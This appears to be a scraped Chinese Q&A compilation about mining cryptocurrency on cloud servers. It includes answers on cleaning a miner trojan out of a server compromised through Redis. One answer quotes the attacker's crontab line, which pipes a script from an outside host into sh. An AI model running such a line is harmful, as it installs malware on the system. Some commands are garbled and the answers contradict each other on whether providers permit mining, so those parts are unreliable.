雲伺服器如何挖礦
⑴ 阿里雲允許用雲主機挖礦嗎
是可以的。很多挖礦項目都可以使用雲伺服器,例如最近火熱的Swarm bzz。但Swarm白皮書沒有提供挖礦的硬體配置推薦,然而目前,因為各類硬體采購價格高、到貨慢,然而時間不等人!綜合對比下來,針對BZZ挖礦,推薦雲伺服器!
像Swarm BZZ這樣的去中心化存儲的情況下,以太坊生態中的熱點數據每秒都在隨時被調用和存儲,所以除了CPU、內存和硬碟這三個主要的響應能力之外,還有一個要求寬頻傳輸速度。
使用雲伺服器來部署bzz節點,核心理由就是一個字「快」,節點早一分鍾上線,就能更早的獲取到頭礦!
經西部數碼上千bzz節點部署的實踐經驗證明,bzz節點需要較高的帶寬和超強的磁碟IO性能,以下是結合資源實際消耗情況合理搭配的配置。
4核CPU + 4G內存 + 100G SSD硬碟 + 20M帶寬。上述配置,可以部署一個節點。
如果需要部署多節點可以選擇多台這樣的雲伺服器,或者選擇更高配置的雲伺服器,如16核CPU + 24G內存 + 500G SSD硬碟 + 200M帶寬,可部署5-10個節點。
⑵ 能否用雲伺服器進行cpu挖礦
當然可以啦!
不過要選擇可以Cpu挖礦的幣。
1.cpu挖礦的本身比較少了,比較有名的有:xmr,hsr等
2.租用伺服器的成本要考慮進去了。
挖礦基本沒法他用了
⑶ 如何用Linux伺服器挖礦教程
今天早上起來一看,伺服器腳本一個都沒有啟動!甚是奇怪,遠程登錄伺服器,也是異常的卡,直到最後卡死,只好重新啟動伺服器!
啟動之後沒一會又會變卡,越來越卡,top查看進程!不覺又奇怪的進程,因為平常也不經常看!所以自己也搞不明白怎麼回事兒!只好到群里問了問,說是被挖礦的掛了木馬文件了,是由於redis的漏洞!
後來我自己發現,原來redis遠程可以直接登錄,原以為redis和mysql不開放登錄許可權就不會支持遠程登錄呢,看來是我想多了
看了好長時間才發現一個異常的進程,自啟的進程 molibe !
找到進程位置 ps -ef|grep molibe ;
在tmp目錄下,打開一看的確是有
chmod -x molibe 取消執行許可權在來到/var/spool/cron下,cat root 查看定時器的執行發現之前腳本都被改了,顧不得刪除cron,service crond restart 重新啟動,再有就時kill 掉molibe進程
這樣大概整個就結束了!但是根本是因為redis漏洞,所以還是補上吧
首先修改redis'埠,找到redis.conf文件 port **** 修改埠號再有就是必須修改密碼 # requirepass ******** 去除#號重新啟動 /redis/src/redis-server /redis/redis-conf
啟動成功之後
redis/redis-cli -p ****(埠) -a *****(密碼)
⑷ 如何把右下角挖礦測試去除
一種是使用雲安全中心自動清理,另一種是手動清除。登錄到雲安全中心控制台左側欄,選擇威脅檢測,安全告警處理在安全告警處理列表中,找到挖礦程序,然後點處理雲安全中心安全告警處理然後根據提示一步步操作即可。
去除的方法
手動清除挖礦程序護雲盾以Linux伺服器為例,按照以下步驟排查及處理查看挖礦進程的執行PID,命令表示該進程的PID。清除挖礦進程的執行文件,在高CPU消耗的進程中定位到挖礦進程,並殺死該進程。
檢查雲伺服器的防火牆中是否存在挖礦程序的礦池地址,可疑通信地址和開放埠,命令iptablesLn執行以下命令清除惡意礦池地址vietcsysconfigiptables排查是否存在定時任務crontabl根據排查的結果,對可疑的定時任務文件進行清理,防止二次入侵。
⑸ GEC微型雲礦機是什麼
GEC微型雲礦機是通過大量的專業計算晶元,並配有特製的主板插槽,加上高速雲端伺服器的應用,共同組成的一個大型礦機網路。
採用多晶元,多處理器的並行演算法,因此,比個人計算機挖礦更快,效率更高。
⑹ 用GPU雲伺服器可以挖礦么比如最近很火的以太坊
挖礦跟顯存沒關系,是看GPU核心的計算能力,只要是顯卡就能挖礦,但只會選用性價比高的中高端顯卡,還有專門的非顯卡礦機不用顯卡挖礦,但礦機只能挖對應的一種幣,不能自行更換幣種,如果是顯卡組礦機的話只要有演算法,哪種幣都可以挖
⑺ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白
1. 關閉訪問挖礦伺服器的訪問
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。
3. pkill minerd ,殺掉進程
4. service stop crond 或者 crontab -r 刪除所有的執行計劃
5. 執行top,查看了一會,沒有再發現minerd 進程了。
6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。
下載腳本的語句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:
View Code
解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:
1. 修復 redis 的後門,
配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號
3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.
⑻ 如何通過雲計算伺服器實現比特幣挖礦
各公有雲廠商都明確要求不允許使用雲伺服器進行挖礦,否則會被封禁的;
挖礦主要使用的是GPU,目前各公有雲廠商提供的GPU伺服器都比較貴的,從性價比上來說不劃算,還不如用專用晶元;
當然,有黑客通過漏洞入侵伺服器,在上面植入挖礦程序和腳本,進行挖礦操作,但這個本身是不合法的行為。